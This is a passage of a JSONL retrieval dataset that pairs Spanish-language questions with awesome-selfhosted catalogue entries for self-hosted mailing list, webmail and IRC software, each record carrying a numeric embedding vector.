0.04246, 0.00056, -0.01579, 0.03899, 0.01383, 0.02126, -0.04594, 0.11806, -0.02511, 0.0904, 0.0465, 0.00751, 0.00227, -0.02313, -0.05241, -0.06713, -0.05494, -0.01167, -0.10423, 0.04088, 0.00568, -0.01451, 0.05587, -0.05754, -0.03436, 0.04698, 0.01521, 0.00047, 0.23597, -0.03568, 0.07617, 0.15227, -0.02339, 0.11202, -0.10799, 0.01309, -0.027, -0.1132, -0.02426, -0.07614, -0.04772, -0.01556, 0.01746, -0.03539, -0.02305, 0.04587, 0.02583, 0.03816, 0.02085, -0.07668, -0.03656, -0.07837, -0.09325, -0.02007, 0.07579, -0.09035, -0.00462, 0.05525, 0.00898, -0.05942, 0.09026, -0.03644, -0.05193, -0.02147, -0.05738, -0.00645, -0.00459, 0.03216, 0.07052, -0.0204, 0.04001, 0.06467, -0.02841, 0.1359, 0.05192, 0.09714, 0.09492, -0.00675, 0.0039, -0.0992, 0.04233, -0.03262, 0.02038, 0.01882, -0.06636, 0.06111, 0.05896, -0.01982, -0.05578, 0.02528, -0.02528, 0.05392, -0.00497, 0.06156, -0.00099, 0.05261, 0.03479, -0.01909, 0.04139, 0.00845, 0.02118, -0.02305, -0.05325, -0.03747, -0.05923, 0.00548, 0.00878, -0.01896, 0.04152, 0.01531, -0.04382, 0.03952, 0.06796, 0.08642, 0.06552, -0.00469, 0.02486, 0.02651, -0.02275, -0.00391, -0.04388, 0.03318, 0.02807, 0.04378, 0.01853, 0.01259, -0.00791, 0.03228, 0.0151, -0.009, -0.00841, 0.02637, -0.00327, 0.0213, -0.0501, 0.05645, 0.01187, -0.00983, 0.00184, -0.04716, 0.01677, -0.04937, -0.00313, 0.00173, 0.01, 0.10094, 0.02115, 0.00229, -0.04171, 0.02429, -0.05617, 0.00809, -0.05932, -0.0155, -0.01197, 0.00659, 0.00987, -0.02108, 0.05891, 0.06035]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mailing Lists and Newsletters", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters", "tema": "communication - email - mailing lists and newsletters", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters: HyperKitty β€” Access GNU Mailman v3 archives [GPL-3.0, Python]. Keila β€” Reliable and easy-to-use newsletter tool (alternative to Mailchimp and Sendinblue) [AGPL-3.0, Docker]. Listmonk β€” High performance, self-hosted newsletter and mailing list manager with a modern dashboard [AGPL-3.0, Go/Docker]. Mailman β€” Manage electronic mail discussion and e-newsletter lists [GPL-3.0, Python]. Mautic β€” Marketing automation software (email, social and more) [GPL-3.0, PHP]. mlmmj β€” Mailing list management made joyful [MIT, C]. phpList β€” Newsletter and email marketing with advanced management of subscribers, bounces, and plugins [AGPL-3.0, PHP]. Postorius β€” Web user interface to access GNU Mailman [GPL-3.0, Python]. Schleuder β€” GPG-enabled mailing list manager with resending-capabilities [GPL-3.0, Ruby]. Sympa β€” Mailing list manager [GPL-2.0, Perl].", "indexar": "cuΓ‘les son las mejores herramientas gratuitas para crear newsletters desde mi propio servidor?", "v": [0.19612, 0.1255, -0.08228, -0.02807, 0.04821, -0.09837, -0.02234, -0.0758, -0.10908, -0.10803, -0.11213, -0.00807, 0.07703, -0.1479, 0.04903, 0.06678, 0.08915, -0.13688, 0.06309, 0.13139, 0.01125, 0.02958, -0.02181, -0.04089, -0.16094, -0.11707, 0.16711, -0.07375, -0.13632, 0.12865, 0.0743, 0.00555, 0.02867, -0.04855, 0.02303, -0.05511, 0.01714, 0.13777, -0.08912, -0.01571, 0.03911, 0.01206, -0.0534, 0.04764, -0.00176, -0.03402, -0.0404, -0.01554, 0.00501, -0.0344, -0.03737, -0.0866, -0.03798, -0.01659, 0.01163, -0.1018, 0.12375, -0.15962, 0.03491, -0.0894, -0.10771, 0.07991, -0.01355, 0.02413, 0.02524, -0.08661, -0.00207, -0.12228, -0.12614, 0.01054, -0.02659, -0.0546, 0.02739, -0.0065, 0.04884, 0.10237, -0.00011, -0.00685, -0.00105, 0.08444, 0.06265, -0.04133, -0.00338, 0.01293, -0.12472, 0.02189, 0.04534, -0.07741, 0.01656, -0.02182, 0.04847, 0.05231, -0.04177, 0.13267, -0.03912, -0.02655, 0.12862, -0.09094, 0.03163, 0.03776, -0.01733, -0.04315, -0.00195, 0.05412, -0.0113, 0.06436, 0.0289, -0.06037, -0.02019, -0.01194, 0.01253, -0.02485, 0.00327, -0.01303, -0.06138, -0.05074, -0.03637, -0.09242, 0.09211, -0.00193, -0.0201, -0.02715, -0.02796, -0.00493, -0.00827, 0.02977, -0.00021, 0.06384, -0.01512, -0.00984, 0.00522, -0.01374, -0.08565, -0.0554, -0.04966, -0.00712, 0.0806, -0.06038, -0.11878, -0.0965, -0.03294, 0.00948, -0.0363, -0.03898, 0.09917, -0.02411, 0.04573, -0.10201, -0.04741, 0.01817, -0.01502, -0.01974, 0.01954, 0.02069, -0.04495, -0.00608, -0.04366, -0.1148, 0.01129, 0.08879, 0.01488, 0.00829, 0.00216, 0.02243, 0.01134, -0.0273, 0.02363, 0.04762, 0.07445, 0.07487, -0.01431, 0.09039, 0.00793, -0.07189, -0.00261, -0.06211, -0.00155, -0.05544, 0.02715, -0.06499, -0.02414, 0.04775, -0.07216, -0.04496, -0.07439, -0.0741, -0.00025, -0.00964, 0.09511, 0.07877, -0.04201, 0.00842, -0.04538, 0.00218, 0.06058, -0.06589, -0.05398, -0.11302, -0.03958, -0.02325, -0.08783, -0.06095, -0.05814, -0.07062, 0.00301, 0.01527, -0.04399, 0.01227, -0.00737, 0.0202, 0.00461, -0.01297, 0.07727, -0.11027, -0.03441, -0.00478, 0.04383, -0.12166, 0.00991, 0.0276, 0.04475, 0.00487, 0.04716, -0.06967, -0.00636, 0.04964, 0.01463, 0.0286, 0.08199, 0.0317, -0.02489, 0.06784, -0.02749, -0.05926, 0.05199, 0.00852, 0.04988, -0.03011, -0.05712, -0.0381, 0.05144, 0.09698, 0.00804, -0.05662, -0.03108, -0.08662, -0.01131, -0.00782, -0.02647, -0.06671, -0.03002, 0.0327, 0.07399, -0.0391, 0.01439, -0.06965]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mailing Lists and Newsletters", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters", "tema": "communication - email - mailing lists and newsletters", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters: HyperKitty β€” Access GNU Mailman v3 archives [GPL-3.0, Python]. Keila β€” Reliable and easy-to-use newsletter tool (alternative to Mailchimp and Sendinblue) [AGPL-3.0, Docker]. Listmonk β€” High performance, self-hosted newsletter and mailing list manager with a modern dashboard [AGPL-3.0, Go/Docker]. Mailman β€” Manage electronic mail discussion and e-newsletter lists [GPL-3.0, Python]. Mautic β€” Marketing automation software (email, social and more) [GPL-3.0, PHP]. mlmmj β€” Mailing list management made joyful [MIT, C]. phpList β€” Newsletter and email marketing with advanced management of subscribers, bounces, and plugins [AGPL-3.0, PHP]. Postorius β€” Web user interface to access GNU Mailman [GPL-3.0, Python]. Schleuder β€” GPG-enabled mailing list manager with resending-capabilities [GPL-3.0, Ruby]. Sympa β€” Mailing list manager [GPL-2.0, Perl].", "indexar": "con quΓ© software puedo montar una lista de distribuciΓ³n segura que no requiera licencia comercial?", "v": [0.05409, 0.02816, -0.19819, -0.10364, -0.07538, -0.18117, -0.03757, 0.02092, -0.22991, -0.15685, 0.00528, -0.10697, 0.11191, -0.14903, 0.01729, -0.02791, 0.00511, -0.16929, 0.07534, 0.04478, 0.07271, -0.04707, -0.10536, -0.14106, -0.04452, -0.01036, 0.04534, -0.12189, -0.11457, 0.1235, 0.07734, 0.01002, 0.07333, -0.06269, 0.01506, 0.08301, 0.02806, 0.00492, 0.14259, -0.10509, 0.10687, -0.02869, -0.04161, -0.07802, 0.02251, -0.01011, -0.01915, -0.0156, -0.00393, -0.08989, 0.01704, 0.00585, -0.09749, -0.10083, 0.11205, -0.07903, 0.01081, 0.06174, 0.08152, -0.03047, -0.00753, 0.00585, -0.01557, -0.02029, 0.027, 0.0198, 0.06701, -0.01355, -0.05457, -0.07024, -0.05098, -0.09082, -0.00331, 0.01888, -0.02145, -0.01819, -0.10354, 0.03765, 0.00771, 0.08584, 0.04716, 0.03934, -0.0206, 0.03984, -0.00144, -0.15591, 0.0809, -0.02917, 0.05613, -0.01968, 0.05587, -0.02999, -0.10505, 0.0535, 0.08838, -0.07548, 0.02456, 0.11389, -0.0487, 0.07368, -0.07482, 0.02913, -0.08264, 0.09762, -0.01704, -0.00744, 0.08095, -0.12415, -0.04011, -0.01394, 0.00099, 0.04766, -0.06214, 0.00116, -0.05468, -0.02928, -0.05643, 0.02555, 0.01913, -0.0164, -0.00159, 0.03105, -0.01569, 0.04116, 0.08848, 0.01036, 0.011, 0.21824, -0.11451, -0.09348, 0.01691, -0.03142, -0.0513, -0.00788, -0.00677, 0.01538, -0.04616, -0.06677, -0.03518, -0.00117, 0.013, -0.04024, -0.04478, -0.02533, 0.08277, 0.02029, -0.00271, -0.0636, 0.00277, 0.01099, 0.00408, 0.0773, 0.00986, 0.03837, -0.0122, 0.05892, 0.09044, -0.05392, 0.07128, 0.04394, 0.04954, 0.09182, -0.04384, 0.00511, 0.03145, 0.03147, -0.03749, 0.03039, 0.05135, 0.04871, -0.02615, 0.05183, 0.00924, -0.03749, 0.01698, -0.00905, -0.03175, -0.03464, -0.02774, -0.01969, -0.09026, -0.02647, -0.02273, 0.02133, -0.00582, -0.00335, -0.03574, 0.00542, 0.03086, 0.05728, -0.01191, 0.02486, 0.0003, -0.03188, -0.00728, -0.03355, 0.00051, 0.00628, -0.02694, -0.06813, -0.04376, -0.05669, -0.0106, -0.02544, 0.06864, -0.00674, -0.02447, 0.16747, 0.02271, 0.05435, 0.01278, -0.04292, 0.05067, -0.01616, -0.0736, -0.04484, 0.04181, 0.00615, -0.02492, 0.02711, 0.03693, 0.0064, 0.05338, -0.01176, -0.01576, -0.01743, 0.01153, 0.05437, 0.07219, 0.06148, -0.0337, 0.06999, 0.00646, -0.04068, 0.05665, 0.00075, 0.01081, -0.02923, -0.00539, -0.04032, 0.01674, 0.09575, -0.00538, -0.08952, -0.04839, -0.03527, -0.07303, -0.00498, -0.00576, -0.08464, -0.06209, 0.01053, 0.041, -0.03313, 0.00353, -0.04449]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Webmail Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Webmail Clients", "tema": "communication - email - webmail clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Webmail Clients: Cypht β€” Feed reader for your email accounts [LGPL-2.1, PHP]. Roundcube β€” Browser-based IMAP client with an application-like user interface [GPL-3.0, PHP/deb]. SnappyMail β€” Simple, modern, lightweight & fast web-based email client (fork of RainLoop) [AGPL-3.0, PHP]. SquirrelMail β€” Another browser-based IMAP client [GPL-2.0, PHP].", "indexar": "que programa me sirve para leer mi correo electrΓ³nico desde el navegador?", "v": [-0.09851, 0.03773, -0.14961, -0.16262, -0.04183, -0.08726, 0.04163, 0.03277, -0.08162, -0.2144, -0.06178, -0.06197, 0.09973, -0.16285, 0.05798, -0.01661, 0.15931, -0.03198, 0.09671, 0.01311, -0.00623, 0.04512, -0.03093, -0.04637, -0.03635, 0.09064, -0.03195, 0.00232, 0.06295, 0.02066, -0.03175, 0.01269, 0.05064, -0.08616, 0.02038, 0.08137, 0.20694, 0.00859, -0.05531, 0.02126, 0.07564, -0.03511, -0.03807, 0.05385, 0.02883, -0.05124, 0.08614, -0.00847, -0.05701, -0.03554, -0.03273, 0.0405, -0.08293, 0.05046, -0.00936, 0.05084, 0.07545, -0.17152, 0.08204, -0.09516, 0.04281, -0.03286, 0.0805, 0.01998, 0.0346, -0.01639, 0.10571, -0.05195, -0.17003, 0.01477, 0.00427, 0.01632, -0.01051, -0.04347, -0.06005, 0.04101, 0.02789, 0.0118, 0.11707, -0.00238, 0.11392, -0.0193, -0.05982, 0.03364, -0.0189, -0.02508, 0.02525, -0.01218, 0.03248, 0.00029, 0.08737, 0.16623, -0.06096, 0.05899, -0.02703, -0.11593, 0.07984, -0.01165, -0.00453, 0.07721, 0.07807, -0.05637, -0.04955, 0.11926, -0.0112, 0.0425, 0.05887, -0.02898, 0.01249, 0.08564, 0.00454, -0.04522, -0.06084, -0.10187, -0.0457, 0.02172, -0.0284, -0.08276, 0.00376, -0.10819, -0.0983, 0.06159, -0.13688, 0.00135, 0.09587, 0.00208, -0.02356, 0.00851, -0.00801, 0.07818, 0.00626, -0.08449, -0.04897, -0.02808, 0.00124, -0.03854, -0.05994, -0.03112, 0.0072, -0.02248, 0.10623, 0.05928, 0.00491, 0.00779, 0.02334, -0.06941, 0.04548, -0.08698, -0.07022, -0.09707, -0.04467, -0.05967, 0.03054, 0.01084, -0.06438, -0.01063, 0.01554, -0.04358, 0.01189, 0.07548, -0.0561, 0.04351, 0.06865, 0.01558, -0.00042, -0.07145, -0.08198, 0.01208, 0.11776, 0.11225, -0.04486, 0.06318, 0.0647, -0.11464, -0.03179, -0.03084, 0.00946, 0.01398, 0.00491, 0.0227, -0.08338, 0.04561, 0.02662, 0.00346, -0.12186, -0.05093, -0.02414, -0.03862, -0.03518, -0.01205, -0.02311, 0.02495, -0.0309, 0.01539, 0.0276, 0.01545, -0.09881, -0.01711, -0.00166, -0.06842, -0.06122, -0.0065, -0.0112, -0.02782, -0.00222, 0.09503, 0.02488, -0.05388, 0.01518, 0.10944, -0.00396, -0.05512, 0.06034, 0.02233, 0.02467, -0.05105, 0.07358, 0.04363, 0.02197, 0.05123, -0.00053, -0.05004, 0.00996, 0.0255, 0.02813, -0.06694, 0.07337, -0.01162, -0.02577, 0.02552, -0.00736, -0.03633, -0.02596, -0.0544, 0.01865, -0.025, 0.00805, -0.01551, -0.05269, -0.05944, -0.00282, 0.06885, -0.0023, -0.05909, 0.00201, -0.00159, -0.10171, 0.01375, -0.03729, 0.00902, -0.10182, -0.00904, 0.02768, -0.06929, 0.01019, 0.06299]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Webmail Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Webmail Clients", "tema": "communication - email - webmail clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Webmail Clients: Cypht β€” Feed reader for your email accounts [LGPL-2.1, PHP]. Roundcube β€” Browser-based IMAP client with an application-like user interface [GPL-3.0, PHP/deb]. SnappyMail β€” Simple, modern, lightweight & fast web-based email client (fork of RainLoop) [AGPL-3.0, PHP]. SquirrelMail β€” Another browser-based IMAP client [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Outlook Web Access?", "v": [-0.05901, 0.06334, -0.06816, -0.1148, -0.10813, -0.03372, -0.03076, -0.13859, -0.05103, 0.04251, -0.05106, -0.27706, 0.03399, 0.13665, 0.07683, -0.06021, 0.17554, -0.13822, 0.04736, -0.01273, -0.04594, 0.09331, -0.12246, 0.00069, 0.01458, 0.02107, -0.00063, 0.06106, 0.02067, -0.0153, 0.00341, -0.03339, -0.02916, 0.06317, 0.01183, 0.11021, 0.11476, 0.09579, 0.13105, -0.11988, 0.04099, 0.01201, -0.10518, 0.13607, 0.06818, 0.0131, -0.03947, 0.17365, 0.0272, 0.02154, -0.11364, -0.07311, -0.10529, 0.02293, 0.05877, 0.05087, 0.14447, -0.07354, 0.01081, 0.00216, -0.05852, 0.06375, 0.00423, -0.03532, -0.04896, -0.01887, -0.05787, 0.04805, -0.05912, 0.09008, 0.08008, -0.06233, 0.05609, -0.00725, -0.03074, 0.04854, -0.02391, -0.01259, -0.0199, 0.12074, 0.04373, -0.09863, 0.03111, 0.05647, -0.01041, -0.09194, 0.10967, -0.08693, -0.04345, -0.07645, 0.14273, 0.00074, -0.04968, 0.07974, -0.05155, -0.18293, -0.04166, -0.03922, 0.00481, 0.01918, -0.02189, 0.00306, -0.13959, 0.05919, 0.024, -0.00394, -0.02438, -0.01845, -0.09938, 0.0691, 0.0207, 0.01795, 0.03029, -0.02902, 0.01567, -0.08655, -0.02294, -0.06505, -0.02444, 0.04127, -0.0172, 0.00673, -0.09476, -0.02626, -0.00813, 0.02203, 0.03717, 0.03664, -0.06516, 0.00665, 0.03403, -0.11738, -0.10468, -0.10348, -0.07515, -0.07087, 0.0435, -0.12279, 0.05898, 0.01257, 0.03225, -0.03087, -0.02993, 0.01463, 0.05738, -0.02023, 0.0133, 0.06145, -0.08181, -0.02507, -0.07779, 0.00948, -0.0278, 0.06655, -0.03702, -0.00383, -0.05288, 0.05869, -0.03095, 0.0689, 0.00108, 0.01414, 0.01089, 0.06322, -0.01088, -0.03436, -0.01081, 0.01965, -0.06367, 0.04953, 0.04372, 0.09152, 0.03825, -0.06616, 0.01272, -0.00707, 0.00964, -0.08039, 0.09326, -0.02279, 0.02862, 0.04355, -0.07235, -0.01273, -0.08699, -0.03318, -0.03109, 0.02821, -0.02649, 0.04976, -0.07554, 0.00064, -0.04121, -0.05344, 0.05758, 0.04492, -0.03388, -0.1562, -0.0561, -0.03913, -0.05259, -0.05642, -0.00464, -0.05901, -0.01413, 0.01829, -0.04159, 0.04587, -0.0125, 0.05883, 0.03096, 0.0086, 0.0504, -0.00159, 0.03853, -0.02185, 0.05236, -0.0156, -0.01301, -0.03749, 0.0057, -0.04957, -0.03326, -0.00673, 0.02994, 0.01179, -0.02153, 0.02823, -0.05767, 0.02877, 0.03409, -0.02638, -0.02255, 0.00565, 0.0325, -0.03833, -0.01158, 0.00766, 0.03885, 0.02399, 0.02612, 0.03863, -0.00088, 0.02258, -0.05073, -0.01975, -0.06069, -0.00347, -0.07827, 0.00321, -0.02378, 0.02003, -0.0194, 0.00407, 0.0257, 0.00888]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Webmail Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Webmail Clients", "tema": "communication - email - webmail clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Webmail Clients: Cypht β€” Feed reader for your email accounts [LGPL-2.1, PHP]. Roundcube β€” Browser-based IMAP client with an application-like user interface [GPL-3.0, PHP/deb]. SnappyMail β€” Simple, modern, lightweight & fast web-based email client (fork of RainLoop) [AGPL-3.0, PHP]. SquirrelMail β€” Another browser-based IMAP client [GPL-2.0, PHP].", "indexar": "con que puedo montar un cliente de email ligero y rΓ‘pido en mi navegador?", "v": [0.00588, 0.05999, -0.18847, -0.09924, -0.21557, -0.01498, -0.02201, 0.18101, -0.19395, -0.22954, 0.01156, -0.12385, 0.16644, -0.0724, 0.06651, 0.0216, 0.06798, -0.02127, 0.07842, -0.01053, 0.02123, -0.01901, -0.07271, -0.0484, -0.00877, 0.03688, 0.01476, 0.02121, -0.06249, 0.0657, -0.01207, -0.01106, 0.00035, 0.08835, 0.02323, -0.00094, 0.09964, 0.05559, -0.0113, -0.03533, 0.1509, -0.06328, -0.03128, 0.01909, -0.00853, -0.00013, 0.07072, -0.09421, -0.01744, 0.0249, 0.06399, -0.00424, -0.17352, -0.02476, -0.09115, 0.10148, 0.11802, -0.12341, 0.182, -0.09414, 0.10831, 0.05476, -0.00768, 0.14929, -0.01812, -0.03614, 0.04613, -0.05872, -0.08564, -0.03313, 0.04383, -0.06869, -0.04052, -0.00488, -0.02511, 0.04419, 0.02489, 0.03263, 0.05005, 0.10804, 0.10053, -0.00152, -0.05763, -0.00418, -0.08511, -0.07961, -0.00727, -0.0849, 0.04096, 0.02258, 0.12323, 0.11092, -0.00295, 0.04904, -0.06493, -0.1384, 0.0113, -0.03316, -0.05682, 0.02166, -0.08567, 0.02037, -0.0291, 0.15407, 0.03543, -0.07556, 0.03232, -0.04197, 0.00111, 0.02411, -0.03513, -0.00197, -0.07253, -0.08022, -0.02468, -0.05696, -0.01156, -0.06167, -0.07955, -0.05858, -0.02059, 0.07038, -0.00779, 0.01125, -0.00576, 0.00959, 0.03227, 0.0641, -0.03925, -0.01539, 0.02174, -0.0659, -0.06855, -0.01622, 0.05217, 0.07825, -0.06535, -0.02114, 0.00714, 0.01493, 0.0187, -0.0885, -0.02068, -0.02307, 0.07058, -0.03628, -0.01206, -0.0404, -0.09689, -0.03595, 0.033, 0.0138, 0.01165, -0.05356, -0.0585, -0.06278, 0.02304, -0.03159, 0.08868, 0.04771, -0.02399, 0.10795, 0.11842, 0.08471, 0.01018, -0.07854, -0.06559, -0.01613, 0.05091, 0.04063, -0.01928, 0.01373, 0.00902, -0.05509, 0.03472, 0.05783, -0.00062, 0.06883, -0.00896, 0.0444, 0.04218, -0.01308, -0.0101, 0.06342, -0.09153, -0.02226, 0.00395, -0.02735, -0.04855, 0.03932, -0.03588, 0.03696, -0.00183, 0.04032, 0.03474, -0.02046, -0.04758, -0.0096, -0.06004, -0.04171, 0.01973, -0.06837, 0.01256, 0.02395, -0.05698, -0.00395, 0.01697, 0.05444, 0.01034, 0.0153, -0.00905, -0.00815, 0.07239, -0.02341, 0.03306, 0.02017, 0.03235, 0.00429, -0.0148, 0.03621, 0.00425, -0.01362, 0.03266, 0.03826, -0.01421, 0.04854, 0.0053, -0.00842, -0.04737, 0.02713, 0.0052, -0.02438, -0.05279, -0.0525, 0.04062, 0.0017, 0.03448, -0.04975, -0.03322, 0.06439, 0.06222, 0.0185, 0.0588, -0.00466, -0.006, 0.04492, -0.05931, 0.00062, -0.06528, -0.02641, -0.07677, -0.03281, -0.01732, -0.02973, -0.00827, 0.03184]} -{"tipo": "pregunta", "herramienta": "Communication - IRC", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - IRC", "tema": "communication - irc", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - IRC: Ergo β€” Modern IRCv3 server written in Go, combining the features of an ircd, a services framework, and a bouncer [MIT, Go/Docker]. Glowing Bear β€” A web frontend for WeeChat [GPL-3.0, Nodejs]. InspIRCd β€” Modular IRC server written in C++ for Linux, BSD, Windows, and macOS [GPL-2.0, C++/Docker]. Kiwi IRC β€” Responsive web IRC client with theming support [Apache-2.0, Nodejs]. ngircd β€” Portable and lightweight Internet Relay Chat server for small or private networks [GPL-2.0, C/deb]. Quassel IRC β€” Distributed IRC client, meaning that one (or multiple) client(s) can attach to and detach from a central core [GPL-2.0, C++]. Robust IRC β€” IRC without netsplits. Distributed IRC server, based on RobustSession protocol [BSD-3-Clause, Go]. The Lounge β€” Self-hosted web IRC client [MIT, Nodejs/Docker]. UnrealIRCd β€” Modular, advanced and highly configurable IRC server written in C for Linux, BSD, Windows, and macOS [GPL-2.0, C]. Weechat β€” Fast, light and extensible chat client [GPL-3.0, C/Docker/deb]. ZNC β€” Advanced IRC bouncer [Apache-2.0, C++/deb].", "indexar": "que programa hay para chatear en tiempo real tipo chat de texto como el de internet que sea moderno y funcione bien desde la web?", "v": [-0.02348, 0.05833, -0.13644, 0.04063, -0.02335, -0.16412, -0.04662, -0.03449, -0.03225, -0.00099, -0.03067, -0.1156, -0.01165, -0.06283, 0.05889, 0.06404, 0.06723, -0.08633, 0.13976, -0.09836, -0.02732, -0.00992, -0.01689, -0.05138, -0.12798, -0.01252, 0.01881, -0.02351, -0.08655, 0.18446, 0.04343, 0.07321, 0.06053, -0.00922, 0.0067, -0.06749, 0.12768, 0.07665, -0.06524, 0.04001, 0.12348, -0.0036, -0.05797, 0.11281, 0.10815, 0.00789, 0.02108, -0.14545, -0.01339, 0.00119, -0.09136, -0.00884, 0.00097, 0.07079, -0.0836, -0.04319, 0.12454, -0.08176, 0.10396, -0.15258, -0.08019, 0.03042, -0.05028, -0.05159, 0.02179, 0.06734, -0.02294, 0.00663, -0.05109, 0.0583, -0.01302, -0.01009, 0.01386, 0.05517, 0.0257, 0.03348, -0.11149, 0.00935, 0.01874, -0.06013, 0.0183, -0.04027, 0.01882, 0.0607, -0.13986, -0.01325, 0.08253, -0.13192, -0.02683, -0.01067, 0.10271, 0.11266, 0.05631, 0.05286, -0.00344, -0.10018, 0.05795, -0.07715, 0.09662, 0.00841, 0.06845, 0.00507, -0.14571, 0.04581, -0.02439, 0.00311, 0.06503, -0.03537, -0.06029, -0.02928, -0.01195, -0.04493, -0.00047, -0.08014, 0.00882, -0.0005, 0.02938, -0.05813, 0.00985, -0.08885, -0.13273, -0.01761, -0.06268, 0.03543, 0.03229, 0.02595, -0.01786, -0.02401, 0.00623, 0.02627, -0.02965, -0.04663, -0.10611, -0.14528, -0.02578, 0.08328, -0.0014, 0.03339, 0.0513, -0.0771, -0.00915, 0.07724, -0.10522, -0.0005, -0.01804, 0.00583, 0.00895, -0.0745, -0.1047, 0.01677, -0.01279, 0.11242, 0.01714, 0.09698, -0.04493, 0.0076, -0.03738, 0.00511, 0.01233, 0.08139, -0.03911, -0.04823, 0.03071, -0.03858, 0.00801, 0.01458, -0.11403, 0.10207, 0.04019, 0.03269, -0.04426, 0.05907, 0.05117, -0.09457, 0.01616, 0.04275, -0.04822, 0.00685, 0.02246, -0.03222, -0.1066, -0.03352, 0.00544, 0.00438, -0.04972, 0.00143, -0.03429, 0.01715, -0.06827, -0.03235, 0.01027, -0.03139, -0.02715, 0.10049, -0.02041, 0.0469, -0.05206, -0.00767, 0.05395, -0.07997, -0.07679, -0.09677, 0.0545, -0.01282, -0.04579, 0.12479, 0.0018, -0.00188, 0.0266, 0.08916, 0.01864, -0.06209, 0.03343, -0.0255, -0.02526, 0.00746, 0.06355, -0.03845, -0.01739, 0.00902, 0.0154, -0.04404, 0.00036, 0.03757, 0.0102, -0.03633, 0.00303, 0.07679, 0.06426, 0.00982, -0.04173, -0.06743, -0.01182, -0.06382, 0.00282, 0.00368, 0.04593, -0.0433, -0.1328, -0.08243, -0.03799, 0.04822, -0.00598, 0.00771, 0.01234, -0.05293, -0.16483, 0.01765, -0.01339, -0.03895, -0.086, -0.01385, -0.0149, -0.04677, 0.06768, 0.00613]} -{"tipo": "pregunta", "herramienta": "Communication - IRC", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - IRC", "tema": "communication - irc", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - IRC: Ergo β€” Modern IRCv3 server written in Go, combining the features of an ircd, a services framework, and a bouncer [MIT, Go/Docker]. Glowing Bear β€” A web frontend for WeeChat [GPL-3.0, Nodejs]. InspIRCd β€” Modular IRC server written in C++ for Linux, BSD, Windows, and macOS [GPL-2.0, C++/Docker]. Kiwi IRC β€” Responsive web IRC client with theming support [Apache-2.0, Nodejs]. ngircd β€” Portable and lightweight Internet Relay Chat server for small or private networks [GPL-2.0, C/deb]. Quassel IRC β€” Distributed IRC client, meaning that one (or multiple) client(s) can attach to and detach from a central core [GPL-2.0, C++]. Robust IRC β€” IRC without netsplits. Distributed IRC server, based on RobustSession protocol [BSD-3-Clause, Go]. The Lounge β€” Self-hosted web IRC client [MIT, Nodejs/Docker]. UnrealIRCd β€” Modular, advanced and highly configurable IRC server written in C for Linux, BSD, Windows, and macOS [GPL-2.0, C]. Weechat β€” Fast, light and extensible chat client [GPL-3.0, C/Docker/deb]. ZNC β€” Advanced IRC bouncer [Apache-2.0, C++/deb].", "indexar": "cual es una alternativa libre a los servidores de IRC tradicionales que pueda montar yo mismo en casa sin complicaciones?", "v": [0.01839, 0.02364, -0.15193, 0.02377, -0.0572, -0.04198, 0.17071, 0.00737, -0.11353, -0.06089, -0.03517, -0.09554, 0.15623, -0.08494, 0.13586, 0.07128, 0.04381, 0.0269, 0.10951, 0.012, -0.07197, -0.10363, -0.01678, 0.02433, -0.04862, -0.01792, 0.00652, -0.03552, -0.10421, -0.00314, 0.06488, 0.08187, 0.13143, -0.01766, -0.0667, -0.04484, 0.05279, 0.07903, -0.02977, -0.10589, 0.08099, -0.12503, -0.07793, 0.00109, -0.03646, -0.03006, -0.01798, -0.05036, -0.02696, 0.01315, -0.08648, -0.08211, -0.05548, 0.00856, -0.03903, 0.01549, 0.1096, -0.04599, 0.0358, -0.01716, -0.05569, 0.16198, 0.07844, 0.08978, 0.08833, 0.00136, -0.10705, -0.00992, -0.01652, -0.08261, -0.02567, -0.00852, -0.00637, -0.08784, -0.13834, 0.08864, -0.06305, -0.07326, 0.05248, 0.01534, 0.04025, 0.00745, -0.01825, 0.06624, -0.06191, -0.04746, 0.09881, -0.08435, 0.08653, 0.00811, 0.05512, 0.00261, 0.05192, 0.12051, 0.04644, -0.12973, 0.19202, 0.08765, -0.0038, 0.04056, 0.01006, 0.06354, -0.00827, 0.04954, -0.00178, 0.04387, 0.13014, -0.03694, 0.01263, -0.07154, -0.0196, 0.12077, -0.06065, 0.09833, -0.02707, -0.03091, -0.0791, 0.01288, 0.00423, 0.0671, -0.04864, 0.03011, 0.08314, -0.01374, -0.00153, -0.05109, 0.12946, 0.04774, -0.04001, 0.02966, -0.01631, -0.0635, -0.06287, -0.08673, -0.07053, 0.02824, 0.026, -0.1154, -0.01559, -0.05554, 0.06108, 0.04568, -0.00942, -0.12499, 0.09882, 0.0141, 0.04989, -0.08588, -0.03913, 0.02338, -0.07157, 0.09703, 0.00854, 0.07224, -0.03187, 0.00865, -0.01287, -0.01347, -0.04603, 0.13585, 0.00445, 